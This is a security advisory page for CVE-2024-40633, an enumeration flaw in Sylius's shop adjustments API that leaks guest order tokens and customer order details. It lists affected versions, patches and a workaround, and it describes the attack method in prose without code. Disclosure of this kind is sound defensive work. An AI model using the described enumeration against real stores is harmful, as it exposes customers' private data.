VYPR
← All advisories
Medium severity5.3OSV Advisory· Published Jul 17, 2024· Updated Apr 15, 2026

CVE-2024-40633

CVE-2024-40633

Description

Sylius is an Open Source eCommerce Framework on Symfony. A security vulnerability was discovered in the /api/v2/shop/adjustments/{id} endpoint, which retrieves order adjustments based on incremental integer IDs. The vulnerability allows an attacker to enumerate valid adjustment IDs and retrieve order tokens. Using these tokens, an attacker can access guest customer order details - sensitive guest customer information. The issue is fixed in versions: 1.12.19, 1.13.4 and above. The /api/v2/shop/adjustments/{id} will always return 404 status. Users are advised to upgrade. Users unable to upgrade may alter their config to mitigate this issue. Please see the linked GHSA for details.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Sylius eCommerce framework API endpoint returns order adjustments with incremental IDs, allowing enumeration to obtain guest order tokens and access sensitive customer information.

The vulnerability resides in the /api/v2/shop/adjustments/{id} endpoint of Sylius, an open-source eCommerce framework built on Symfony [1]. The endpoint uses incremental integer IDs to retrieve order adjustments. An attacker can exploit this predictable ID pattern to enumerate valid adjustment IDs and extract associated order tokens [3].

No special privileges are required; the endpoint is publicly accessible in the shop API [2]. By sending sequential requests to /api/v2/shop/adjustments/{id}, an attacker can discover valid adjustment IDs and retrieve the corresponding order tokens [1]. These tokens are then used to access guest customer order details without authentication [3].

The impact is information disclosure: an attacker can obtain sensitive guest customer information, including order details, by leveraging the enumerated tokens [1]. This compromises the confidentiality of guest customer data in the eCommerce platform [3].

The issue is patched in Sylius versions 1.12.19 and 1.13.4, where the endpoint is disabled and always returns a 404 status [2][3]. Users unable to upgrade can apply a configuration workaround by overriding the endpoint to use ApiPlatform\Core\Action\NotFoundAction, as detailed in the advisory [3].

References
  1. NVD - CVE-2024-40633
  2. bug #16592 [API] Disable shop GET adjustment endpoint (mpysiak, GSadee) · Sylius/Sylius@d833b28
  3. Ability to retrieve Adjustments with an incremental integer ID in an API endpoint

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
sylius/syliusPackagist
>= 1.12.0-alpha.1, < 1.12.191.12.19
sylius/syliusPackagist
>= 1.13.0-alpha.1, < 1.13.41.13.4
sylius/syliusPackagist
< 1.9.121.9.12
sylius/syliusPackagist
>= 1.10.0-alpha.1, < 1.10.161.10.16
sylius/syliusPackagist
>= 1.11.0-alpha.1, < 1.11.171.11.17

Affected products

1

Patches

2
154725494024
https://github.com/sylius/syliusvia osv
commit
8386db967794
https://github.com/sylius/syliusvia osv
commit

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.